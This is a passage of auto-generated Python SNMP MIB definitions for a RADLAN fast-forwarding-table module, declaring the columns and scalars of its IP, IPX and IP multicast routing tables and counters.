if mibBuilder.loadTexts: rlIpFftStnDstIpAddress.setStatus('current')
rlIpFftStnDstRouteIpMask = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 13, 1, 4), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftStnDstRouteIpMask.setStatus('current')
rlIpFftStnDstIpAddrType = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 13, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("local", 1), ("remote", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftStnDstIpAddrType.setStatus('current')
rlIpFftStnDstMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 13, 1, 6), PhysAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftStnDstMacAddress.setStatus('current')
rlIpFftStnSrcMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 13, 1, 7), PhysAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftStnSrcMacAddress.setStatus('current')
rlIpFftStnOutIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 13, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftStnOutIfIndex.setStatus('current')
rlIpFftStnVid = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 13, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftStnVid.setStatus('current')
rlIpFftStnTaggedMode = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 13, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("untagged", 1), ("tagged", 2), ("basedPortConfig", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftStnTaggedMode.setStatus('current')
rlIpFftStnAge = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 13, 1, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftStnAge.setStatus('current')
rlIpFftSubTable = MibTable((1, 3, 6, 1, 4, 1, 89, 47, 1, 14), )
if mibBuilder.loadTexts: rlIpFftSubTable.setStatus('current')
rlIpFftSubEntry = MibTableRow((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1), ).setIndexNames((0, "RADLAN-rlFft", "rlIpFftSubMrid"), (0, "RADLAN-rlFft", "rlIpFftSubDstIpSubnet"), (0, "RADLAN-rlFft", "rlIpFftSubDstIpMask"))
if mibBuilder.loadTexts: rlIpFftSubEntry.setStatus('current')
rlIpFftSubMrid = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubMrid.setStatus('current')
rlIpFftSubDstIpSubnet = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 2), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubDstIpSubnet.setStatus('current')
rlIpFftSubDstIpMask = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubDstIpMask.setStatus('current')
rlIpFftSubAge = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubAge.setStatus('current')
rlIpFftSubNextHopSetRefCount = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopSetRefCount.setStatus('current')
rlIpFftSubNextHopCount = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopCount.setStatus('current')
rlIpFftSubNextHopIfindex1 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIfindex1.setStatus('current')
rlIpFftSubNextHopIpAddr1 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 8), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIpAddr1.setStatus('current')
rlIpFftSubNextHopIfindex2 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIfindex2.setStatus('current')
rlIpFftSubNextHopIpAddr2 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 10), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIpAddr2.setStatus('current')
rlIpFftSubNextHopIfindex3 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIfindex3.setStatus('current')
rlIpFftSubNextHopIpAddr3 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 12), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIpAddr3.setStatus('current')
rlIpFftSubNextHopIfindex4 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 13), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIfindex4.setStatus('current')
rlIpFftSubNextHopIpAddr4 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 14), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIpAddr4.setStatus('current')
rlIpFftSubNextHopIfindex5 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 15), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIfindex5.setStatus('current')
rlIpFftSubNextHopIpAddr5 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 16), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIpAddr5.setStatus('current')
rlIpFftSubNextHopIfindex6 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 17), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIfindex6.setStatus('current')
rlIpFftSubNextHopIpAddr6 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 18), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIpAddr6.setStatus('current')
rlIpFftSubNextHopIfindex7 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 19), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIfindex7.setStatus('current')
rlIpFftSubNextHopIpAddr7 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 20), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIpAddr7.setStatus('current')
rlIpFftSubNextHopIfindex8 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 21), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIfindex8.setStatus('current')
rlIpFftSubNextHopIpAddr8 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 22), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIpAddr8.setStatus('current')
rlIpFftCountersTable = MibTable((1, 3, 6, 1, 4, 1, 89, 47, 1, 15), )
if mibBuilder.loadTexts: rlIpFftCountersTable.setStatus('current')
rlIpFftCountersEntry = MibTableRow((1, 3, 6, 1, 4, 1, 89, 47, 1, 15, 1), ).setIndexNames((0, "RADLAN-rlFft", "rlIpFftCountersIndex"))
if mibBuilder.loadTexts: rlIpFftCountersEntry.setStatus('current')
rlIpFftCountersIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 15, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftCountersIndex.setStatus('current')
rlIpFftInReceives = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 15, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftInReceives.setStatus('current')
rlIpFftForwDatagrams = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 15, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftForwDatagrams.setStatus('current')
rlIpFftInDiscards = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 15, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftInDiscards.setStatus('current')
rlIpFftNextHopTable = MibTable((1, 3, 6, 1, 4, 1, 89, 47, 1, 16), )
if mibBuilder.loadTexts: rlIpFftNextHopTable.setStatus('current')
rlIpFftNextHopEntry = MibTableRow((1, 3, 6, 1, 4, 1, 89, 47, 1, 16, 1), ).setIndexNames((0, "RADLAN-rlFft", "rlIpFftNextHopifindex"), (0, "RADLAN-rlFft", "rlIpFftNextHopIpAddress"))
if mibBuilder.loadTexts: rlIpFftNextHopEntry.setStatus('current')
rlIpFftNextHopifindex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 16, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftNextHopifindex.setStatus('current')
rlIpFftNextHopIpAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 16, 1, 2), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftNextHopIpAddress.setStatus('current')
rlIpFftNextHopValid = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 16, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("valid", 1), ("invalid", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftNextHopValid.setStatus('current')
rlIpFftNextHopType = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 16, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("local", 1), ("remote", 2), ("reject", 3), ("drop", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftNextHopType.setStatus('current')
rlIpFftNextHopReferenceCount = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 16, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftNextHopReferenceCount.setStatus('current')
rlIpFftNextHopNetAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 16, 1, 6), PhysAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftNextHopNetAddress.setStatus('current')
rlIpFftNextHopVid = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 16, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftNextHopVid.setStatus('current')
rlIpFftNextHopMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 16, 1, 8), PhysAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftNextHopMacAddress.setStatus('current')
rlIpFftNextHopOutIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 16, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftNextHopOutIfIndex.setStatus('current')
rlIpFftL2InfoTable = MibTable((1, 3, 6, 1, 4, 1, 89, 47, 1, 17), )
if mibBuilder.loadTexts: rlIpFftL2InfoTable.setStatus('current')
rlIpFftL2InfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 89, 47, 1, 17, 1), ).setIndexNames((0, "RADLAN-rlFft", "rlIpFftL2InfoIfindex"), (0, "RADLAN-rlFft", "rlIpFftL2InfoDstMacAddress"))
if mibBuilder.loadTexts: rlIpFftL2InfoEntry.setStatus('current')
rlIpFftL2InfoIfindex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 17, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftL2InfoIfindex.setStatus('current')
rlIpFftL2InfoDstMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 17, 1, 2), PhysAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftL2InfoDstMacAddress.setStatus('current')
rlIpFftL2InfoValid = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 17, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("valid", 1), ("invalid", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftL2InfoValid.setStatus('current')
rlIpFftL2InfoType = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 17, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("other", 1), ("vlan", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftL2InfoType.setStatus('current')
rlIpFftL2InfoReferenceCount = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 17, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftL2InfoReferenceCount.setStatus('current')
rlIpFftL2InfoVid = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 17, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftL2InfoVid.setStatus('current')
rlIpFftL2InfoSrcMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 17, 1, 7), PhysAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftL2InfoSrcMacAddress.setStatus('current')
rlIpFftL2InfoOutIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 17, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftL2InfoOutIfIndex.setStatus('current')
rlIpFftL2InfoTaggedMode = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 17, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("untagged", 1), ("tagged", 2), ("basedPortConfig", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftL2InfoTaggedMode.setStatus('current')
rlIpxFFT = MibIdentifier((1, 3, 6, 1, 4, 1, 89, 47, 2))
rlIpxFftMibVersion = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 2, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftMibVersion.setStatus('current')
rlIpxMaxFftNumber = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 2, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxMaxFftNumber.setStatus('current')
rlIpxFftDynamicSupported = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 2, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("supported", 1), ("unsupported", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftDynamicSupported.setStatus('current')
rlIpxFftNetworkSupported = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 2, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("supported", 1), ("unsupported", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftNetworkSupported.setStatus('current')
rlIpxFftUnknownAddrMsgUsed = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 2, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("used", 1), ("unused", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftUnknownAddrMsgUsed.setStatus('current')
rlIpxFftAgingTimeSupported = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 2, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("supported", 1), ("unsupported", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftAgingTimeSupported.setStatus('current')
rlIpxFftSrcAddrSupported = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 2, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("supported", 1), ("unsupported", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftSrcAddrSupported.setStatus('current')
rlIpxFftAgingTimeout = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 2, 8), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: rlIpxFftAgingTimeout.setStatus('current')
rlIpxFftRedBoundary = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 2, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 100))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: rlIpxFftRedBoundary.setStatus('current')
rlIpxFftYellowBoundary = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 2, 10), Percents()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: rlIpxFftYellowBoundary.setStatus('current')
rlIpxFftNumTable = MibTable((1, 3, 6, 1, 4, 1, 89, 47, 2, 12), )
if mibBuilder.loadTexts: rlIpxFftNumTable.setStatus('current')
rlIpxFftNumEntry = MibTableRow((1, 3, 6, 1, 4, 1, 89, 47, 2, 12, 1), ).setIndexNames((0, "RADLAN-rlFft", "rlIpxFftNumIndex"))
if mibBuilder.loadTexts: rlIpxFftNumEntry.setStatus('current')
rlIpxFftNumIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 12, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftNumIndex.setStatus('current')
rlIpxFftNumStnRoutesNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 12, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftNumStnRoutesNumber.setStatus('current')
rlIpxFftNumSubRoutesNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 12, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftNumSubRoutesNumber.setStatus('current')
rlIpxFftStnTable = MibTable((1, 3, 6, 1, 4, 1, 89, 47, 2, 13), )
if mibBuilder.loadTexts: rlIpxFftStnTable.setStatus('current')
rlIpxFftStnEntry = MibTableRow((1, 3, 6, 1, 4, 1, 89, 47, 2, 13, 1), ).setIndexNames((0, "RADLAN-rlFft", "rlIpxFftStnIndex"), (0, "RADLAN-rlFft", "rlIpxFftStnDstNetid"), (0, "RADLAN-rlFft", "rlIpxFftStnDstNode"), (0, "RADLAN-rlFft", "rlIpxFftStnSrcNetid"), (0, "RADLAN-rlFft", "rlIpxFftStnSrcNode"))
if mibBuilder.loadTexts: rlIpxFftStnEntry.setStatus('current')
rlIpxFftStnIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 13, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftStnIndex.setStatus('current')
rlIpxFftStnDstNetid = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 13, 1, 2), NetNumber()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftStnDstNetid.setStatus('current')
rlIpxFftStnDstNode = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 13, 1, 3), PhysAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftStnDstNode.setStatus('current')
rlIpxFftStnSrcNetid = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 13, 1, 4), NetNumber()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftStnSrcNetid.setStatus('current')
rlIpxFftStnSrcNode = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 13, 1, 5), PhysAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftStnSrcNode.setStatus('current')
rlIpxFftStnDstIpxAddrType = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 13, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("local", 1), ("remote", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftStnDstIpxAddrType.setStatus('current')
rlIpxFftStnEncapsulation = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 13, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("novell", 1), ("ethernet", 2), ("llc", 3), ("snap", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftStnEncapsulation.setStatus('current')
rlIpxFftStnDstMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 13, 1, 8), PhysAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftStnDstMacAddress.setStatus('current')
rlIpxFftStnSrcMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 13, 1, 9), PhysAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftStnSrcMacAddress.setStatus('current')
rlIpxFftStnOutIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 13, 1, 10), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftStnOutIfIndex.setStatus('current')
rlIpxFftStnTci = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 13, 1, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftStnTci.setStatus('current')
rlIpxFftStnFacsIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 13, 1, 12), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftStnFacsIndex.setStatus('current')
rlIpxFftStnAge = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 13, 1, 13), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftStnAge.setStatus('current')
rlIpxFftSubTable = MibTable((1, 3, 6, 1, 4, 1, 89, 47, 2, 14), )
if mibBuilder.loadTexts: rlIpxFftSubTable.setStatus('current')
rlIpxFftSubEntry = MibTableRow((1, 3, 6, 1, 4, 1, 89, 47, 2, 14, 1), ).setIndexNames((0, "RADLAN-rlFft", "rlIpxFftSubIndex"), (0, "RADLAN-rlFft", "rlIpxFftSubDstNetid"))
if mibBuilder.loadTexts: rlIpxFftSubEntry.setStatus('current')
rlIpxFftSubIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 14, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftSubIndex.setStatus('current')
rlIpxFftSubDstNetid = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 14, 1, 2), NetNumber()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftSubDstNetid.setStatus('current')
rlIpxFftSubEncapsulation = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 14, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("novell", 1), ("ethernet", 2), ("llc", 3), ("snap", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftSubEncapsulation.setStatus('current')
rlIpxFftSubDstMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 14, 1, 4), PhysAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftSubDstMacAddress.setStatus('current')
rlIpxFftSubSrcMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 14, 1, 5), PhysAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftSubSrcMacAddress.setStatus('current')
rlIpxFftSubOutIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 14, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftSubOutIfIndex.setStatus('current')
rlIpxFftSubTci = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 14, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftSubTci.setStatus('current')
rlIpxFftSubFacsIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 14, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftSubFacsIndex.setStatus('current')
rlIpxFftSubAge = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 14, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftSubAge.setStatus('current')
rlIpxFftCountersTable = MibTable((1, 3, 6, 1, 4, 1, 89, 47, 2, 15), )
if mibBuilder.loadTexts: rlIpxFftCountersTable.setStatus('current')
rlIpxFftCountersEntry = MibTableRow((1, 3, 6, 1, 4, 1, 89, 47, 2, 15, 1), ).setIndexNames((0, "RADLAN-rlFft", "rlIpxFftCountersIndex"))
if mibBuilder.loadTexts: rlIpxFftCountersEntry.setStatus('current')
rlIpxFftCountersIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 15, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftCountersIndex.setStatus('current')
rlIpxFftInReceives = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 15, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftInReceives.setStatus('current')
rlIpxFftForwDatagrams = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 15, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftForwDatagrams.setStatus('current')
rlIpxFftInDiscards = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 15, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftInDiscards.setStatus('current')
rlIpmFFT = MibIdentifier((1, 3, 6, 1, 4, 1, 89, 47, 3))
rlIpmFftMibVersion = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 3, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftMibVersion.setStatus('current')
rlIpmMaxFftNumber = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 3, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmMaxFftNumber.setStatus('current')
rlIpmFftDynamicSupported = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 3, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("supported", 1), ("unsupported", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftDynamicSupported.setStatus('current')
rlIpmFftUnknownAddrMsgUsed = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 3, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("used", 1), ("unused", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftUnknownAddrMsgUsed.setStatus('current')
rlIpmFftUserAgingTimeout = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 3, 5), Unsigned32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: rlIpmFftUserAgingTimeout.setStatus('current')
rlIpmFftRouterAgingTimeout = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 3, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftRouterAgingTimeout.setStatus('current')
rlIpmFftNumTable = MibTable((1, 3, 6, 1, 4, 1, 89, 47, 3, 8), )
if mibBuilder.loadTexts: rlIpmFftNumTable.setStatus('current')
rlIpmFftNumEntry = MibTableRow((1, 3, 6, 1, 4, 1, 89, 47, 3, 8, 1), ).setIndexNames((0, "RADLAN-rlFft", "rlIpmFftNumIndex"))
if mibBuilder.loadTexts: rlIpmFftNumEntry.setStatus('current')
rlIpmFftNumIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 8, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftNumIndex.setStatus('current')
rlIpmFftNumRoutesNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 8, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftNumRoutesNumber.setStatus('current')
